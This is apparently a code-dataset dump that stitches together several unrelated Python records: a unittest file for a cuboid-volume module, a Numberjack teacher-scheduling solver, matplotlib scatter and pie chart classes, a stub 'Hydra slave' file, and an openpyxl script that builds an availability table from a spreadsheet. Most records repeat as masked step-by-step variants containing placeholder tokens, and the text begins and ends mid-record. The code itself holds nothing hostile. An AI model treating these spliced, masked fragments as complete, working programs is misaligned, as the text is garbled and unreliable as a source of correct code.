1, '張下載完成!')\nprint(\"已全部下載完成\")\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
"""
Created on Fri Jan 07 20:53:58 2022
@author: Ankit Bharti
"""
from unittest import TestCase, main
from cuboid_volume import *
class TestCuboid(TestCase):
def test_volume(self):
self.assertAlmostEqual(cuboid_volume(2), 8)
self.assertAlmostEqual(cuboid_volume(1), 1)
self.assertAlmostEqual(cuboid_volume(0), 0)
def test_input_value(self):
self.assertRaises(TypeError, cuboid_volume, 'ank')
def test_addition(self):
self.assertEqual(add(3, 4), 7)
self.assertAlmostEqual(add(4.5, 6.2), 10.701, places=2)
def test_addition_input_value(self):
self.assertRaises(TypeError, add, 'ank', 6)
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "394f835064d070a30040b6f01b25b6f0e005827d",
"index": 5010,
"step-1": "<mask token>\n\n\nclass TestCuboid(TestCase):\n <mask token>\n\n def test_input_value(self):\n self.assertRaises(TypeError, cuboid_volume, 'ank')\n <mask token>\n\n def test_addition_input_value(self):\n self.assertRaises(TypeError, add, 'ank', 6)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestCuboid(TestCase):\n\n def test_volume(self):\n self.assertAlmostEqual(cuboid_volume(2), 8)\n self.assertAlmostEqual(cuboid_volume(1), 1)\n self.assertAlmostEqual(cuboid_volume(0), 0)\n\n def test_input_value(self):\n self.assertRaises(TypeError, cuboid_volume, 'ank')\n\n def test_addition(self):\n self.assertEqual(add(3, 4), 7)\n self.assertAlmostEqual(add(4.5, 6.2), 10.701, places=2)\n\n def test_addition_input_value(self):\n self.assertRaises(TypeError, add, 'ank', 6)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestCuboid(TestCase):\n\n def test_volume(self):\n self.assertAlmostEqual(cuboid_volume(2), 8)\n self.assertAlmostEqual(cuboid_volume(1), 1)\n self.assertAlmostEqual(cuboid_volume(0), 0)\n\n def test_input_value(self):\n self.assertRaises(TypeError, cuboid_volume, 'ank')\n\n def test_addition(self):\n self.assertEqual(add(3, 4), 7)\n self.assertAlmostEqual(add(4.5, 6.2), 10.701, places=2)\n\n def test_addition_input_value(self):\n self.assertRaises(TypeError, add, 'ank', 6)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nfrom unittest import TestCase, main\nfrom cuboid_volume import *\n\n\nclass TestCuboid(TestCase):\n\n def test_volume(self):\n self.assertAlmostEqual(cuboid_volume(2), 8)\n self.assertAlmostEqual(cuboid_volume(1), 1)\n self.assertAlmostEqual(cuboid_volume(0), 0)\n\n def test_input_value(self):\n self.assertRaises(TypeError, cuboid_volume, 'ank')\n\n def test_addition(self):\n self.assertEqual(add(3, 4), 7)\n self.assertAlmostEqual(add(4.5, 6.2), 10.701, places=2)\n\n def test_addition_input_value(self):\n self.assertRaises(TypeError, add, 'ank', 6)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "\"\"\"\nCreated on Fri Jan 07 20:53:58 2022\n@author: Ankit Bharti\n\n\"\"\"\n\n\nfrom unittest import TestCase, main\nfrom cuboid_volume import *\n\n\nclass TestCuboid(TestCase):\n def test_volume(self):\n self.assertAlmostEqual(cuboid_volume(2), 8)\n self.assertAlmostEqual(cuboid_volume(1), 1)\n self.assertAlmostEqual(cuboid_volume(0), 0)\n\n def test_input_value(self):\n self.assertRaises(TypeError, cuboid_volume, 'ank')\n\n def test_addition(self):\n self.assertEqual(add(3, 4), 7)\n self.assertAlmostEqual(add(4.5, 6.2), 10.701, places=2)\n\n def test_addition_input_value(self):\n self.assertRaises(TypeError, add, 'ank', 6)\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
class Subjects(object):
def __init__(self):
self.store = list()
def add(self, subjects):
if isinstance(subjects, (list, tuple)):
self.store.extend(subjects)
elif isinstance(subjects, str):
self.store.append(subjects)
else:
raise TypeError(
'only lists, tuples and strings of subjects can be added')
class TimeSlots(object):
"""
Currently only takes # of timeslots until I can figure out a good
way to standardized time inputs
"""
def __init__(self, num_slots):
if isinstance(num_slots, int):
self.store = num_slots
else:
raise TypeError('only accepts number of timeslots as ints')
class Solver(object):
def __init__(self, teachers, subjects, timeslots):
if timeslots.store < len(teachers.store):
raise ValueError('unable to solve for more teachers than timeslots'
)
self.teachers = teachers.store
self.subjects = subjects.store
self.timeslots = timeslots.store
self.matrix = None
self.model = None
self.solver = None
self.solution = None
def solve(self):
self.matrix = Nj.Matrix(len(self.subjects), self.timeslots, len(
self.teachers) + 1)
self.model = Nj.Model([Nj.AllDiffExcept0(row) for row in self.
matrix.row], [Nj.AllDiffExcept0(col) for col in self.matrix.col])
self.solver = self.model.load('Mistral')
self.solver.solve()
self.solution = self.matrix
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Teachers(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Subjects(object):
def __init__(self):
self.store = list()
def add(self, subjects):
if isinstance(subjects, (list, tuple)):
self.store.extend(subjects)
elif isinstance(subjects, str):
self.store.append(subjects)
else:
raise TypeError(
'only lists, tuples and strings of subjects can be added')
class TimeSlots(object):
"""
Currently only takes # of timeslots until I can figure out a good
way to standardized time inputs
"""
def __init__(self, num_slots):
if isinstance(num_slots, int):
self.store = num_slots
else:
raise TypeError('only accepts number of timeslots as ints')
class Solver(object):
def __init__(self, teachers, subjects, timeslots):
if timeslots.store < len(teachers.store):
raise ValueError('unable to solve for more teachers than timeslots'
)
self.teachers = teachers.store
self.subjects = subjects.store
self.timeslots = timeslots.store
self.matrix = None
self.model = None
self.solver = None
self.solution = None
def solve(self):
self.matrix = Nj.Matrix(len(self.subjects), self.timeslots, len(
self.teachers) + 1)
self.model = Nj.Model([Nj.AllDiffExcept0(row) for row in self.
matrix.row], [Nj.AllDiffExcept0(col) for col in self.matrix.col])
self.solver = self.model.load('Mistral')
self.solver.solve()
self.solution = self.matrix
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Teachers(object):
<|reserved_special_token_0|>
def __init__(self):
self.store = list()
def add(self, teachers):
if isinstance(teachers, (list, tuple)):
self.store.extend(teachers)
elif isinstance(teachers, str):
self.store.append(teachers)
else:
raise TypeError(
'only lists, tuples and strings of teachers can be added')
class Subjects(object):
def __init__(self):
self.store = list()
def add(self, subjects):
if isinstance(subjects, (list, tuple)):
self.store.extend(subjects)
elif isinstance(subjects, str):
self.store.append(subjects)
else:
raise TypeError(
'only lists, tuples and strings of subjects can be added')
class TimeSlots(object):
"""
Currently only takes # of timeslots until I can figure out a good
way to standardized time inputs
"""
def __init__(self, num_slots):
if isinstance(num_slots, int):
self.store = num_slots
else:
raise TypeError('only accepts number of timeslots as ints')
class Solver(object):
def __init__(self, teachers, subjects, timeslots):
if timeslots.store < len(teachers.store):
raise ValueError('unable to solve for more teachers than timeslots'
)
self.teachers = teachers.store
self.subjects = subjects.store
self.timeslots = timeslots.store
self.matrix = None
self.model = None
self.solver = None
self.solution = None
def solve(self):
self.matrix = Nj.Matrix(len(self.subjects), self.timeslots, len(
self.teachers) + 1)
self.model = Nj.Model([Nj.AllDiffExcept0(row) for row in self.
matrix.row], [Nj.AllDiffExcept0(col) for col in self.matrix.col])
self.solver = self.model.load('Mistral')
self.solver.solve()
self.solution = self.matrix
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Teachers(object):
"""Will be expanded to allow constraints for individual teachers"""
def __init__(self):
self.store = list()
def add(self, teachers):
if isinstance(teachers, (list, tuple)):
self.store.extend(teachers)
elif isinstance(teachers, str):
self.store.append(teachers)
else:
raise TypeError(
'only lists, tuples and strings of teachers can be added')
class Subjects(object):
def __init__(self):
self.store = list()
def add(self, subjects):
if isinstance(subjects, (list, tuple)):
self.store.extend(subjects)
elif isinstance(subjects, str):
self.store.append(subjects)
else:
raise TypeError(
'only lists, tuples and strings of subjects can be added')
class TimeSlots(object):
"""
Currently only takes # of timeslots until I can figure out a good
way to standardized time inputs
"""
def __init__(self, num_slots):
if isinstance(num_slots, int):
self.store = num_slots
else:
raise TypeError('only accepts number of timeslots as ints')
class Solver(object):
def __init__(self, teachers, subjects, timeslots):
if timeslots.store < len(teachers.store):
raise ValueError('unable to solve for more teachers than timeslots'
)
self.teachers = teachers.store
self.subjects = subjects.store
self.timeslots = timeslots.store
self.matrix = None
self.model = None
self.solver = None
self.solution = None
def solve(self):
self.matrix = Nj.Matrix(len(self.subjects), self.timeslots, len(
self.teachers) + 1)
self.model = Nj.Model([Nj.AllDiffExcept0(row) for row in self.
matrix.row], [Nj.AllDiffExcept0(col) for col in self.matrix.col])
self.solver = self.model.load('Mistral')
self.solver.solve()
self.solution = self.matrix
<|reserved_special_token_1|>
import Numberjack as Nj
class Teachers(object):
"""Will be expanded to allow constraints for individual teachers"""
def __init__(self):
self.store = list()
def add(self, teachers):
if isinstance(teachers, (list, tuple)):
self.store.extend(teachers)
elif isinstance(teachers, str):
self.store.append(teachers)
else:
raise TypeError('only lists, tuples and strings '
'of teachers can be added')
class Subjects(object):
def __init__(self):
self.store = list()
def add(self, subjects):
if isinstance(subjects, (list, tuple)):
self.store.extend(subjects)
elif isinstance(subjects, str):
self.store.append(subjects)
else:
raise TypeError('only lists, tuples and strings '
'of subjects can be added')
class TimeSlots(object):
"""
Currently only takes # of timeslots until I can figure out a good
way to standardized time inputs
"""
def __init__(self, num_slots):
if isinstance(num_slots, int):
self.store = num_slots
else:
raise TypeError('only accepts number of timeslots as ints')
class Solver(object):
def __init__(self, teachers, subjects, timeslots):
if timeslots.store < len(teachers.store):
raise ValueError('unable to solve for more teachers '
'than timeslots')
self.teachers = teachers.store
self.subjects = subjects.store
self.timeslots = timeslots.store
self.matrix = None
self.model = None
self.solver = None
self.solution = None
def solve(self):
self.matrix = Nj.Matrix(len(self.subjects),
self.timeslots,
len(self.teachers)+1)
self.model = Nj.Model(
[Nj.AllDiffExcept0(row) for row in self.matrix.row],
[Nj.AllDiffExcept0(col) for col in self.matrix.col]
)
self.solver = self.model.load('Mistral')
self.solver.solve()
self.solution = self.matrix
|
flexible
|
{
"blob_id": "8787126e654808a5fec52283780d9b4f668fa50f",
"index": 8593,
"step-1": "<mask token>\n\n\nclass Subjects(object):\n\n def __init__(self):\n self.store = list()\n\n def add(self, subjects):\n if isinstance(subjects, (list, tuple)):\n self.store.extend(subjects)\n elif isinstance(subjects, str):\n self.store.append(subjects)\n else:\n raise TypeError(\n 'only lists, tuples and strings of subjects can be added')\n\n\nclass TimeSlots(object):\n \"\"\"\n Currently only takes # of timeslots until I can figure out a good\n way to standardized time inputs\n \"\"\"\n\n def __init__(self, num_slots):\n if isinstance(num_slots, int):\n self.store = num_slots\n else:\n raise TypeError('only accepts number of timeslots as ints')\n\n\nclass Solver(object):\n\n def __init__(self, teachers, subjects, timeslots):\n if timeslots.store < len(teachers.store):\n raise ValueError('unable to solve for more teachers than timeslots'\n )\n self.teachers = teachers.store\n self.subjects = subjects.store\n self.timeslots = timeslots.store\n self.matrix = None\n self.model = None\n self.solver = None\n self.solution = None\n\n def solve(self):\n self.matrix = Nj.Matrix(len(self.subjects), self.timeslots, len(\n self.teachers) + 1)\n self.model = Nj.Model([Nj.AllDiffExcept0(row) for row in self.\n matrix.row], [Nj.AllDiffExcept0(col) for col in self.matrix.col])\n self.solver = self.model.load('Mistral')\n self.solver.solve()\n self.solution = self.matrix\n",
"step-2": "<mask token>\n\n\nclass Teachers(object):\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Subjects(object):\n\n def __init__(self):\n self.store = list()\n\n def add(self, subjects):\n if isinstance(subjects, (list, tuple)):\n self.store.extend(subjects)\n elif isinstance(subjects, str):\n self.store.append(subjects)\n else:\n raise TypeError(\n 'only lists, tuples and strings of subjects can be added')\n\n\nclass TimeSlots(object):\n \"\"\"\n Currently only takes # of timeslots until I can figure out a good\n way to standardized time inputs\n \"\"\"\n\n def __init__(self, num_slots):\n if isinstance(num_slots, int):\n self.store = num_slots\n else:\n raise TypeError('only accepts number of timeslots as ints')\n\n\nclass Solver(object):\n\n def __init__(self, teachers, subjects, timeslots):\n if timeslots.store < len(teachers.store):\n raise ValueError('unable to solve for more teachers than timeslots'\n )\n self.teachers = teachers.store\n self.subjects = subjects.store\n self.timeslots = timeslots.store\n self.matrix = None\n self.model = None\n self.solver = None\n self.solution = None\n\n def solve(self):\n self.matrix = Nj.Matrix(len(self.subjects), self.timeslots, len(\n self.teachers) + 1)\n self.model = Nj.Model([Nj.AllDiffExcept0(row) for row in self.\n matrix.row], [Nj.AllDiffExcept0(col) for col in self.matrix.col])\n self.solver = self.model.load('Mistral')\n self.solver.solve()\n self.solution = self.matrix\n",
"step-3": "<mask token>\n\n\nclass Teachers(object):\n <mask token>\n\n def __init__(self):\n self.store = list()\n\n def add(self, teachers):\n if isinstance(teachers, (list, tuple)):\n self.store.extend(teachers)\n elif isinstance(teachers, str):\n self.store.append(teachers)\n else:\n raise TypeError(\n 'only lists, tuples and strings of teachers can be added')\n\n\nclass Subjects(object):\n\n def __init__(self):\n self.store = list()\n\n def add(self, subjects):\n if isinstance(subjects, (list, tuple)):\n self.store.extend(subjects)\n elif isinstance(subjects, str):\n self.store.append(subjects)\n else:\n raise TypeError(\n 'only lists, tuples and strings of subjects can be added')\n\n\nclass TimeSlots(object):\n \"\"\"\n Currently only takes # of timeslots until I can figure out a good\n way to standardized time inputs\n \"\"\"\n\n def __init__(self, num_slots):\n if isinstance(num_slots, int):\n self.store = num_slots\n else:\n raise TypeError('only accepts number of timeslots as ints')\n\n\nclass Solver(object):\n\n def __init__(self, teachers, subjects, timeslots):\n if timeslots.store < len(teachers.store):\n raise ValueError('unable to solve for more teachers than timeslots'\n )\n self.teachers = teachers.store\n self.subjects = subjects.store\n self.timeslots = timeslots.store\n self.matrix = None\n self.model = None\n self.solver = None\n self.solution = None\n\n def solve(self):\n self.matrix = Nj.Matrix(len(self.subjects), self.timeslots, len(\n self.teachers) + 1)\n self.model = Nj.Model([Nj.AllDiffExcept0(row) for row in self.\n matrix.row], [Nj.AllDiffExcept0(col) for col in self.matrix.col])\n self.solver = self.model.load('Mistral')\n self.solver.solve()\n self.solution = self.matrix\n",
"step-4": "<mask token>\n\n\nclass Teachers(object):\n \"\"\"Will be expanded to allow constraints for individual teachers\"\"\"\n\n def __init__(self):\n self.store = list()\n\n def add(self, teachers):\n if isinstance(teachers, (list, tuple)):\n self.store.extend(teachers)\n elif isinstance(teachers, str):\n self.store.append(teachers)\n else:\n raise TypeError(\n 'only lists, tuples and strings of teachers can be added')\n\n\nclass Subjects(object):\n\n def __init__(self):\n self.store = list()\n\n def add(self, subjects):\n if isinstance(subjects, (list, tuple)):\n self.store.extend(subjects)\n elif isinstance(subjects, str):\n self.store.append(subjects)\n else:\n raise TypeError(\n 'only lists, tuples and strings of subjects can be added')\n\n\nclass TimeSlots(object):\n \"\"\"\n Currently only takes # of timeslots until I can figure out a good\n way to standardized time inputs\n \"\"\"\n\n def __init__(self, num_slots):\n if isinstance(num_slots, int):\n self.store = num_slots\n else:\n raise TypeError('only accepts number of timeslots as ints')\n\n\nclass Solver(object):\n\n def __init__(self, teachers, subjects, timeslots):\n if timeslots.store < len(teachers.store):\n raise ValueError('unable to solve for more teachers than timeslots'\n )\n self.teachers = teachers.store\n self.subjects = subjects.store\n self.timeslots = timeslots.store\n self.matrix = None\n self.model = None\n self.solver = None\n self.solution = None\n\n def solve(self):\n self.matrix = Nj.Matrix(len(self.subjects), self.timeslots, len(\n self.teachers) + 1)\n self.model = Nj.Model([Nj.AllDiffExcept0(row) for row in self.\n matrix.row], [Nj.AllDiffExcept0(col) for col in self.matrix.col])\n self.solver = self.model.load('Mistral')\n self.solver.solve()\n self.solution = self.matrix\n",
"step-5": "import Numberjack as Nj\n\n\nclass Teachers(object):\n \"\"\"Will be expanded to allow constraints for individual teachers\"\"\"\n def __init__(self):\n self.store = list()\n\n def add(self, teachers):\n if isinstance(teachers, (list, tuple)):\n self.store.extend(teachers)\n elif isinstance(teachers, str):\n self.store.append(teachers)\n else:\n raise TypeError('only lists, tuples and strings '\n 'of teachers can be added')\n\n\nclass Subjects(object):\n def __init__(self):\n self.store = list()\n\n def add(self, subjects):\n if isinstance(subjects, (list, tuple)):\n self.store.extend(subjects)\n elif isinstance(subjects, str):\n self.store.append(subjects)\n else:\n raise TypeError('only lists, tuples and strings '\n 'of subjects can be added')\n\n\nclass TimeSlots(object):\n \"\"\"\n Currently only takes # of timeslots until I can figure out a good\n way to standardized time inputs\n \"\"\"\n def __init__(self, num_slots):\n if isinstance(num_slots, int):\n self.store = num_slots\n else:\n raise TypeError('only accepts number of timeslots as ints')\n\n\nclass Solver(object):\n def __init__(self, teachers, subjects, timeslots):\n if timeslots.store < len(teachers.store):\n raise ValueError('unable to solve for more teachers '\n 'than timeslots')\n\n self.teachers = teachers.store\n self.subjects = subjects.store\n self.timeslots = timeslots.store\n self.matrix = None\n self.model = None\n self.solver = None\n self.solution = None\n\n def solve(self):\n self.matrix = Nj.Matrix(len(self.subjects),\n self.timeslots,\n len(self.teachers)+1)\n\n self.model = Nj.Model(\n [Nj.AllDiffExcept0(row) for row in self.matrix.row],\n [Nj.AllDiffExcept0(col) for col in self.matrix.col]\n )\n\n self.solver = self.model.load('Mistral')\n self.solver.solve()\n\n self.solution = self.matrix\n",
"step-ids": [
9,
10,
12,
13,
15
]
}
|
[
9,
10,
12,
13,
15
] |
<|reserved_special_token_0|>
class Scatter:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Pie:
def __init__(self, values, labels, title):
self.style = 'fivethirtyeight'
self.values = values
self.labels = labels
self.explode = [(0) for i in range(len(values))]
self.title = title
def plot(self):
plt.style.use(self.style)
plt.pie(self.values, labels=self.labels, explode=self.explode,
shadow=True, startangle=90, autopct='%1.1f%%', wedgeprops={
'edgecolor': 'black'})
plt.title(self.title)
plt.tight_layout()
plt.show()
class Column:
pass
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Scatter:
def __init__(self, values, ylabel, title):
self.values = values
self.range = list(range(len(values)))
self.ylabel = ylabel
self.title = title
<|reserved_special_token_0|>
class Pie:
def __init__(self, values, labels, title):
self.style = 'fivethirtyeight'
self.values = values
self.labels = labels
self.explode = [(0) for i in range(len(values))]
self.title = title
def plot(self):
plt.style.use(self.style)
plt.pie(self.values, labels=self.labels, explode=self.explode,
shadow=True, startangle=90, autopct='%1.1f%%', wedgeprops={
'edgecolor': 'black'})
plt.title(self.title)
plt.tight_layout()
plt.show()
class Column:
pass
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Scatter:
def __init__(self, values, ylabel, title):
self.values = values
self.range = list(range(len(values)))
self.ylabel = ylabel
self.title = title
def plot(self):
fig = plt.figure()
ax = fig.add_axes([0, 0, 1, 1])
ax.scatter(self.range, self.values, color='r', s=1)
ax.set_xlabel('Days')
ax.set_ylabel(self.ylabel)
ax.set_title(self.title)
plt.ylim(0, self.values[-1])
plt.show()
class Pie:
def __init__(self, values, labels, title):
self.style = 'fivethirtyeight'
self.values = values
self.labels = labels
self.explode = [(0) for i in range(len(values))]
self.title = title
def plot(self):
plt.style.use(self.style)
plt.pie(self.values, labels=self.labels, explode=self.explode,
shadow=True, startangle=90, autopct='%1.1f%%', wedgeprops={
'edgecolor': 'black'})
plt.title(self.title)
plt.tight_layout()
plt.show()
class Column:
pass
<|reserved_special_token_1|>
import matplotlib.pyplot as plt
class Scatter:
def __init__(self, values, ylabel, title):
self.values = values
self.range = list(range(len(values)))
self.ylabel = ylabel
self.title = title
def plot(self):
fig = plt.figure()
ax = fig.add_axes([0, 0, 1, 1])
ax.scatter(self.range, self.values, color='r', s=1)
ax.set_xlabel('Days')
ax.set_ylabel(self.ylabel)
ax.set_title(self.title)
plt.ylim(0, self.values[-1])
plt.show()
class Pie:
def __init__(self, values, labels, title):
self.style = 'fivethirtyeight'
self.values = values
self.labels = labels
self.explode = [(0) for i in range(len(values))]
self.title = title
def plot(self):
plt.style.use(self.style)
plt.pie(self.values, labels=self.labels, explode=self.explode,
shadow=True, startangle=90, autopct='%1.1f%%', wedgeprops={
'edgecolor': 'black'})
plt.title(self.title)
plt.tight_layout()
plt.show()
class Column:
pass
<|reserved_special_token_1|>
import matplotlib.pyplot as plt
class Scatter:
def __init__(self, values, ylabel, title):
self.values = values
self.range = list(range(len(values)))
self.ylabel = ylabel
self.title = title
def plot(self):
fig = plt.figure()
ax = fig.add_axes([0, 0, 1, 1])
ax.scatter(self.range, self.values, color='r', s=1)
ax.set_xlabel('Days')
ax.set_ylabel(self.ylabel)
ax.set_title(self.title)
plt.ylim(0, self.values[-1])
plt.show()
class Pie:
def __init__(self, values, labels, title):
self.style = "fivethirtyeight"
self.values = values
self.labels = labels
self.explode = [0 for i in range(len(values))]
self.title = title
def plot(self):
plt.style.use(self.style)
plt.pie(self.values, labels=self.labels, explode=self.explode, shadow=True,
startangle=90, autopct='%1.1f%%',
wedgeprops={'edgecolor': 'black'})
plt.title(self.title)
plt.tight_layout()
plt.show()
class Column:
pass
|
flexible
|
{
"blob_id": "58385a7713a8f88925ced714d25f1522bc7e39d8",
"index": 1181,
"step-1": "<mask token>\n\n\nclass Scatter:\n <mask token>\n <mask token>\n\n\nclass Pie:\n\n def __init__(self, values, labels, title):\n self.style = 'fivethirtyeight'\n self.values = values\n self.labels = labels\n self.explode = [(0) for i in range(len(values))]\n self.title = title\n\n def plot(self):\n plt.style.use(self.style)\n plt.pie(self.values, labels=self.labels, explode=self.explode,\n shadow=True, startangle=90, autopct='%1.1f%%', wedgeprops={\n 'edgecolor': 'black'})\n plt.title(self.title)\n plt.tight_layout()\n plt.show()\n\n\nclass Column:\n pass\n",
"step-2": "<mask token>\n\n\nclass Scatter:\n\n def __init__(self, values, ylabel, title):\n self.values = values\n self.range = list(range(len(values)))\n self.ylabel = ylabel\n self.title = title\n <mask token>\n\n\nclass Pie:\n\n def __init__(self, values, labels, title):\n self.style = 'fivethirtyeight'\n self.values = values\n self.labels = labels\n self.explode = [(0) for i in range(len(values))]\n self.title = title\n\n def plot(self):\n plt.style.use(self.style)\n plt.pie(self.values, labels=self.labels, explode=self.explode,\n shadow=True, startangle=90, autopct='%1.1f%%', wedgeprops={\n 'edgecolor': 'black'})\n plt.title(self.title)\n plt.tight_layout()\n plt.show()\n\n\nclass Column:\n pass\n",
"step-3": "<mask token>\n\n\nclass Scatter:\n\n def __init__(self, values, ylabel, title):\n self.values = values\n self.range = list(range(len(values)))\n self.ylabel = ylabel\n self.title = title\n\n def plot(self):\n fig = plt.figure()\n ax = fig.add_axes([0, 0, 1, 1])\n ax.scatter(self.range, self.values, color='r', s=1)\n ax.set_xlabel('Days')\n ax.set_ylabel(self.ylabel)\n ax.set_title(self.title)\n plt.ylim(0, self.values[-1])\n plt.show()\n\n\nclass Pie:\n\n def __init__(self, values, labels, title):\n self.style = 'fivethirtyeight'\n self.values = values\n self.labels = labels\n self.explode = [(0) for i in range(len(values))]\n self.title = title\n\n def plot(self):\n plt.style.use(self.style)\n plt.pie(self.values, labels=self.labels, explode=self.explode,\n shadow=True, startangle=90, autopct='%1.1f%%', wedgeprops={\n 'edgecolor': 'black'})\n plt.title(self.title)\n plt.tight_layout()\n plt.show()\n\n\nclass Column:\n pass\n",
"step-4": "import matplotlib.pyplot as plt\n\n\nclass Scatter:\n\n def __init__(self, values, ylabel, title):\n self.values = values\n self.range = list(range(len(values)))\n self.ylabel = ylabel\n self.title = title\n\n def plot(self):\n fig = plt.figure()\n ax = fig.add_axes([0, 0, 1, 1])\n ax.scatter(self.range, self.values, color='r', s=1)\n ax.set_xlabel('Days')\n ax.set_ylabel(self.ylabel)\n ax.set_title(self.title)\n plt.ylim(0, self.values[-1])\n plt.show()\n\n\nclass Pie:\n\n def __init__(self, values, labels, title):\n self.style = 'fivethirtyeight'\n self.values = values\n self.labels = labels\n self.explode = [(0) for i in range(len(values))]\n self.title = title\n\n def plot(self):\n plt.style.use(self.style)\n plt.pie(self.values, labels=self.labels, explode=self.explode,\n shadow=True, startangle=90, autopct='%1.1f%%', wedgeprops={\n 'edgecolor': 'black'})\n plt.title(self.title)\n plt.tight_layout()\n plt.show()\n\n\nclass Column:\n pass\n",
"step-5": "import matplotlib.pyplot as plt\r\n\r\n\r\nclass Scatter:\r\n def __init__(self, values, ylabel, title):\r\n self.values = values\r\n self.range = list(range(len(values)))\r\n self.ylabel = ylabel\r\n self.title = title\r\n\r\n def plot(self):\r\n fig = plt.figure()\r\n ax = fig.add_axes([0, 0, 1, 1])\r\n ax.scatter(self.range, self.values, color='r', s=1)\r\n ax.set_xlabel('Days')\r\n ax.set_ylabel(self.ylabel)\r\n ax.set_title(self.title)\r\n plt.ylim(0, self.values[-1])\r\n plt.show()\r\n\r\n\r\nclass Pie:\r\n def __init__(self, values, labels, title):\r\n self.style = \"fivethirtyeight\"\r\n self.values = values\r\n self.labels = labels\r\n self.explode = [0 for i in range(len(values))]\r\n self.title = title\r\n\r\n def plot(self):\r\n plt.style.use(self.style)\r\n\r\n plt.pie(self.values, labels=self.labels, explode=self.explode, shadow=True,\r\n startangle=90, autopct='%1.1f%%',\r\n wedgeprops={'edgecolor': 'black'})\r\n\r\n plt.title(self.title)\r\n plt.tight_layout()\r\n\r\n plt.show()\r\n\r\n\r\nclass Column:\r\n pass",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
#!/usr/bin/python
#
#
# This is the Hydra slave module
|
normal
|
{
"blob_id": "95cdf6a22655d500c2838899ec9dfbff637a5969",
"index": 2097,
"step-1": "#!/usr/bin/python\n#\n#\n\n# This is the Hydra slave module\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
1
]
}
|
[
1
] |
import pandas as pd
import os
import openpyxl
from collections import defaultdict,deque
# 調節用パラメータ
filename = 'kaito7.xlsx' # 入力ファイル名
Output = 'output7.xlsx' # 出力ディレクトリ
wb = openpyxl.load_workbook(filename)
sheets = wb.sheetnames
days = []
names = []
dict = defaultdict(dict)
for sheet in sheets:
sh = wb[sheet]
i = 3
while True:
tmp = sh.cell(row=1,column=i).value
if tmp:
days.append(tmp)
else:
break
i += 1
print(days)
days.pop()
i = 2
while True:
tmp = sh.cell(row=i,column=2).value
if tmp:
names.append(tmp)
else:
break
i += 1
W = len(days)
H = len(names)
for y in range(2,2+H):
for x in range(3,3+W):
tmp = sh.cell(row=y,column=x).value
dict[names[y-2]][days[x-3]] = tmp
times = dict['しまむら']['7/10(水)'].split(', ')
ans = [[' ', ' '] + names]
for d in days:
for t in times:
tmpl = [d,t]
for n in names:
if dict[n][d] and t in dict[n][d]:
tmpl.append(1)
else:
tmpl.append(0)
ans.append(tmpl)
for a in ans:
print(a)
wb = openpyxl.load_workbook(Output)
sheets = wb.sheetnames
sheet = wb[sheets[0]]
def write_list_2d(sheet, l_2d, start_row, start_col):
for y, row in enumerate(l_2d):
for x, cell in enumerate(row):
#print(l_2d[y][x])
sheet.cell(row=start_row + y,column=start_col + x,value=l_2d[y][x])
#print(sheet.cell(row=start_row + y,column=start_col + x).value)
write_list_2d(sheet,ans,1,1)
wb.save(Output)
print(sheets[0])
|
normal
|
{
"blob_id": "37d5696c402737bfafe21b20b90a49e2753fdc4f",
"index": 7287,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor sheet in sheets:\n sh = wb[sheet]\n i = 3\n while True:\n tmp = sh.cell(row=1, column=i).value\n if tmp:\n days.append(tmp)\n else:\n break\n i += 1\n print(days)\n days.pop()\n i = 2\n while True:\n tmp = sh.cell(row=i, column=2).value\n if tmp:\n names.append(tmp)\n else:\n break\n i += 1\n W = len(days)\n H = len(names)\n for y in range(2, 2 + H):\n for x in range(3, 3 + W):\n tmp = sh.cell(row=y, column=x).value\n dict[names[y - 2]][days[x - 3]] = tmp\n<mask token>\nfor d in days:\n for t in times:\n tmpl = [d, t]\n for n in names:\n if dict[n][d] and t in dict[n][d]:\n tmpl.append(1)\n else:\n tmpl.append(0)\n ans.append(tmpl)\nfor a in ans:\n print(a)\n<mask token>\n\n\ndef write_list_2d(sheet, l_2d, start_row, start_col):\n for y, row in enumerate(l_2d):\n for x, cell in enumerate(row):\n sheet.cell(row=start_row + y, column=start_col + x, value=l_2d[\n y][x])\n\n\nwrite_list_2d(sheet, ans, 1, 1)\nwb.save(Output)\nprint(sheets[0])\n",
"step-3": "<mask token>\nfilename = 'kaito7.xlsx'\nOutput = 'output7.xlsx'\nwb = openpyxl.load_workbook(filename)\nsheets = wb.sheetnames\ndays = []\nnames = []\ndict = defaultdict(dict)\nfor sheet in sheets:\n sh = wb[sheet]\n i = 3\n while True:\n tmp = sh.cell(row=1, column=i).value\n if tmp:\n days.append(tmp)\n else:\n break\n i += 1\n print(days)\n days.pop()\n i = 2\n while True:\n tmp = sh.cell(row=i, column=2).value\n if tmp:\n names.append(tmp)\n else:\n break\n i += 1\n W = len(days)\n H = len(names)\n for y in range(2, 2 + H):\n for x in range(3, 3 + W):\n tmp = sh.cell(row=y, column=x).value\n dict[names[y - 2]][days[x - 3]] = tmp\ntimes = dict['しまむら']['7/10(水)'].split(', ')\nans = [[' ', ' '] + names]\nfor d in days:\n for t in times:\n tmpl = [d, t]\n for n in names:\n if dict[n][d] and t in dict[n][d]:\n tmpl.append(1)\n else:\n tmpl.append(0)\n ans.append(tmpl)\nfor a in ans:\n print(a)\nwb = openpyxl.load_workbook(Output)\nsheets = wb.sheetnames\nsheet = wb[sheets[0]]\n\n\ndef write_list_2d(sheet, l_2d, start_row, start_col):\n for y, row in enumerate(l_2d):\n 